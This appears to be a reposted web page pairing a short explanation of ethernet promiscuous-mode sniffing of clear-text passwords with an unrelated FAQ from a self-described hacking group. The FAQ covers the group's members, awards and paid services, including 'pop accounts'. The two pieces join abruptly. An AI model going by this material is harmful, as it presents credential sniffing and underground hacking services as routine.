The most popular way of connecting computers is through ethernet. Ethernet protocol works by sending packet information to all the hosts on the same circuit. The packet header contains the proper address of the destination machine. Only the machine with the matching address is suppose to accept the packet. A machine that is accepting all packets, no matter what the packet header says, is said to be in promiscuous mode.

Because, in a normal networking environment, account and password information is passed along
ethernet in clear-text, it is not hard for an intruder once they obtain root to put a machine into
promiscuous mode and by sniffing, compromise all the machines on the net.


Q.  What is Psychotic?

A. I would describe Psychotic as more of a proffessional group rather than just a hacking clan. We think about money first and hacking second, even though I'm sure that most of you have seen a few of our hacking projects...

Q.  Is psychotic looking for new members?

A. Well as of now we aren't looking for any additions to our staff, but stay posted we might decide that we need new members.

Q.  What is Psychosis?

A. Psychosis is a personal project taken up by Virtual Circuit. It's an award that he gives out to hackers that have done something to stand out(good webpage, revealed exploits, etc.). If you think that you should receive the award you can mail him about it.  But I can tell you now that the award isn't easy to get.

Q.  What is the "Devil's Gateway?"

A. The "Devil's Gateway" is a personal project taken up by VooDooHex. It's kind of like an information retrival guild, but yet it's still like a group. If you are interested in joining the Devil's Gateway you should mail VooDoo about it.

Q.  Where can I find some good resources on hacking and phreaking?

A.  Well we aren't much for links but you should check the Psychosis page for his webpage award winners. He picks only the best.

Q.  Who are all the members in Psychotic?

A.  We would like to stay anonymous. But you will see a members name every now and then.

Q.  What are Psychotic's offered services?

A.  Psychotic has many different services, security testing, webpage design, graphic design, sponsoring, pop accounts, and webpage hosting. Each service has a different price.  You can read more about our services on the services section of the page.

This is only the fisrt copy of our FAQ. We will be updating and adding information and questions to it as often as possible. I would appriciate if you would distribute and spready this text as much as you can. We don't want people asking us these questions anymore. Have fun and keep the underground alive.

Binod Narayan Sethi

Binod Narayan Sethi
Binod Narayan Sethi

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More